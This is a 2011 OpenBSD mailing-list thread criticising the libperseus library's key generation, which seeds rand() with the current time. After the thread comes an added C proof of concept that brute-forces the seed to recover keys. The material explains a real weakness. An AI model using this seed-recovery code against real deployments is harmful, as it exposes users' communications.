On Wed, Mar 30, 2011 at 01:29:02PM +0200, Pierre-Emmanuel André wrote:
> On Wed, Mar 30, 2011 at 11:42:23AM +0200, viq wrote:
> > On Tue, Mar 29, 2011 at 06:14:21AM -0600, Pierre-Emmanuel Andre wrote:
> > > CVSROOT:	/cvs
> > > Module name:	ports
> > > Changes by:	p...@cvs.openbsd.org	2011/03/29 06:14:21
> > >
> > > Log message:
> > > Import libperseus.
> > >
> > > PERSEUS library is an open source technology whose aim is to secure any
> > > kind of communication streams against illegitimate or abusive
> > > eavesdropping except for Nation State Security offices, provided that a
> > > suitable, huge computing power is used (from tens of hours with a
> > > supercomputer).
> >
> > "PERSEUS library is an open source technology whose aim is to secure
> > any kind of communication streams against illegitimate or abusive
> > eavesdropping except for Nation State Security offices, provided that a
> > suitable, huge computing power is used (from tens of hours with a
> > supercomputer). PERSEUS enables to provide at the same time users' needs
> > for privacy and confidentiality while preserving the ability of security
> > agencies (police, defense, national security...) to eavesdrop
> > communications of really bad actors (terrorists, child pornographs...)."
> >
> > Huh? While preserving the ability of security agencies to eavesdrop on
> > communications? Any information how that is actually done?
> >
> > Also, anything that uses/plans to use this?
>
> The purpose of perseus is not to "crypt" data but rather to "hide" them
> by adding noise (like this they don't look encrypted).
> And indeed, you can "break" perseus but for this you will need to have
> a huge computing power (typically a supercomputer).
The security model is very odd, but I don't need to convince you of that
to show that this library is just bad.

As far as I can make out, the security is based on the high computational
cost of error-correcting a specific error-correcting code. It uses a secret
key to generate noise and adds this noise into the data stream. The intended
recipient (with the key) can just subtract the noise, but any eavesdropper
would have to perform the expensive error-correcting procedure. The
difficulty of decoding these codes is not a standard cryptographic
assumption, but it appears to be a well-studied problem, so this is "only"
a red flag.

It also doesn't appear to authenticate data; you could probably mount a
timing attack; and it may have more "mundane" bugs like buffer overflows.
Those would be pretty serious issues, but they are not the worst.

No, the real gem is the key generation. It calls srand(time(NULL)), and
then proceeds to use rand(). Seriously:

$ whatis srand
rand, srand (3) - bad random number generator

=== perseus.h ===
/* alea(): a random float in [0, 1] */
#define alea() (rand()/(RAND_MAX + 1.0))
=================

=== perseus.c ===
/***************************************************/
/* Noise generator generation procedure            */
/***************************************************/
int Gen_Noise_Generator(NOISE_GEN * aNGen, INIT_NOISE_GEN * aKey)
{
	unsigned char w, val;
	time_t now;

	now = time(NULL);
	while(now == (time_t)(-1))
		now = time(NULL);
	srand(now);

	/* Feedback polynomials initialization */
	aNGen->L1 = POLY1;
	aNGen->L2 = POLY2;
	aNGen->L3 = POLY3;
	aNGen->L4 = POLY4;

	/* Noise probability generation ([0.15, 0.35])*/
	aNGen->proba = 15 + (int)(20.0 * alea());

	/* Feedback polynomial length initialization */
	aNGen->L1 = LR1;
	aNGen->L2 = LR2;
	aNGen->L3 = LR3;
	aNGen->L4 = LR4;

	/* Boolean filtering function generation */
	w = 0;
	aNGen->Bf = (unsigned char *)calloc(16, sizeof(unsigned char));
	for (w = 0; w < 16; w++) {
		val = (int)(99.0 * alea());
		if(val < aNGen->proba)
			aNGen->Bf[w] = 1;
	}

	/* Noise generator key generation (102 bits) */
	aKey->INIT1 = rand() & MASK1;
	aKey->INIT2 = rand() & MASK2;
	aKey->INIT3 = rand() & MASK3;
	aKey->INIT4 = rand() & MASK4;

	return(1);
}
=================

Why bother with a "difficult" attack if you only have to guess the time
of first connection *to the nearest second*?

Joachim
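The point Joachim makes, as an added example that is not part of the thread and not libperseus code: a key derived from srand(time(NULL)) plus rand() is a deterministic function of a single second, so an attacker who can bound when the connection started simply replays the derivation for every second in that window. The program below mirrors the draw order of the quoted Gen_Noise_Generator() (one alea() for the noise probability, sixteen for the Boolean filter, then four masked rand() calls) and then recovers the seed by brute force. MASK1 to MASK4 are not shown on the page; the 25/25/26/26-bit masks used here (102 bits in total, matching the "102 bits" comment in the quoted code) are an assumption, as is the one-hour search window.

```c
/* Added example, not from the thread or from libperseus: brute-force seed
 * recovery against a key derived via srand(time(NULL)) + rand().
 * Assumed: MASK1..MASK4 as 25/25/26/26-bit masks (102 bits); the seventeen
 * alea() draws before the key are replayed as in the quoted code. */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define MASK1 ((1u << 25) - 1)   /* assumed value, not from the page */
#define MASK2 ((1u << 25) - 1)   /* assumed value, not from the page */
#define MASK3 ((1u << 26) - 1)   /* assumed value, not from the page */
#define MASK4 ((1u << 26) - 1)   /* assumed value, not from the page */

struct perseus_key {
    unsigned INIT1, INIT2, INIT3, INIT4;
};

/* Same definition as the quoted alea() macro. */
static double alea(void)
{
    return rand() / (RAND_MAX + 1.0);
}

/* Replays the quoted key derivation for one candidate seed. The rand()
 * stream is consumed in the same order as Gen_Noise_Generator(): the proba
 * draw, the sixteen Bf[w] draws, then the four key words. Everything here
 * is a pure function of the seed, which is the whole problem. */
struct perseus_key derive_key(time_t seed)
{
    struct perseus_key k;
    int w;

    srand((unsigned)seed);
    (void)alea();                    /* aNGen->proba draw */
    for (w = 0; w < 16; w++)
        (void)alea();                /* the sixteen Bf[w] draws */
    k.INIT1 = rand() & MASK1;
    k.INIT2 = rand() & MASK2;
    k.INIT3 = rand() & MASK3;
    k.INIT4 = rand() & MASK4;
    return k;
}

int key_eq(const struct perseus_key *a, const struct perseus_key *b)
{
    return a->INIT1 == b->INIT1 && a->INIT2 == b->INIT2 &&
           a->INIT3 == b->INIT3 && a->INIT4 == b->INIT4;
}

/* Attacker side: walk every second in [lo, hi] and return the seed whose
 * derived key matches. The predicate here compares against the key itself;
 * against real traffic it would be "does this candidate make the stream
 * decode to plausible data", which is the same loop with a different test.
 * Returns (time_t)-1 if no seed in the window fits. */
time_t recover_seed(const struct perseus_key *observed, time_t lo, time_t hi)
{
    time_t t;

    for (t = lo; t <= hi; t++) {
        struct perseus_key cand = derive_key(t);
        if (key_eq(&cand, observed))
            return t;
    }
    return (time_t)-1;
}

int main(void)
{
    time_t now = time(NULL);
    struct perseus_key victim = derive_key(now);
    /* Assumption for the demo: we only know the connection started
     * sometime in the last hour, i.e. at most 3601 candidates. */
    time_t found = recover_seed(&victim, now - 3600, now);

    if (found == (time_t)-1)
        printf("seed not in window\n");
    else
        printf("seed %ld recovered after %ld candidates\n",
               (long)found, (long)(found - (now - 3600) + 1));
    return 0;
}
```

A one-hour window costs a few thousand calls to derive_key(), which is microseconds of work rather than the "tens of hours with a supercomputer" the port description advertises; widening the window to a whole year still leaves only about 3.2e7 candidates. Note that the attacker must run the same libc rand() implementation as the victim for the replay to line up, since rand() is not specified beyond being deterministic for a given seed.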